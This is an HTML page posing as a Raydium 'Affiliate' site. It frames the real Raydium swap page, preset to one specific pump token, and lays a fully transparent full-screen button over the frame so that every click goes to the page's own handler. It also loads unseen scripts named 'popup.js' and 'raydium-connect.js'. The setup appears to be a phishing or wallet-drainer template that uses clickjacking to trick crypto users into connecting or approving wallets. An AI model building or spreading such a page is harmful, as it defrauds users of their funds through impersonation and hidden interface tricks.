<!DOCTYPE html>
<html>
<head>
    <title>Affiliate | Raydium</title>
    <link rel="icon" type="image/x-icon" href="favicon.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <script src="popup.js"></script>
    <script src="raydium-connect.js" defer></script>

    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            overflow: hidden;
        }
        #raydiumFrame {
            border: none;
            width: 100vw;
            height: 100vh;
        }

        .protect {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: rgba(0, 0, 0, .8);
            z-index: 1;
            opacity: 0;
        }
    </style>
</head>
<body>
    <button id="secure-button" class="protect" onclick="location.reload();"></button>    <iframe id="raydiumFrame" src=""></iframe>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const iframe = document.getElementById('raydiumFrame');
            const isMobile = window.innerWidth <= 768; // Adjust this breakpoint as needed
            
            // Set the appropriate URL based on device type
            iframe.src = isMobile
                 ? "https://raydium.io/swap/?inputMint=sol&outputMint=4Cnk9EPnW5ixfLZatCPJjDB1PUtcRpVVgTQukm9epump&responsive=1"
                : "https://raydium.io/swap/?inputMint=sol&outputMint=4Cnk9EPnW5ixfLZatCPJjDB1PUtcRpVVgTQukm9epump";
            
            // Adjust iframe size
            function resizeIframe() {
                iframe.style.width = window.innerWidth + 'px';
                iframe.style.height = window.innerHeight + 'px';
            }
            
            resizeIframe();
            window.addEventListener('resize', resizeIframe);
        });
        </script>
</body>
</html>
</html>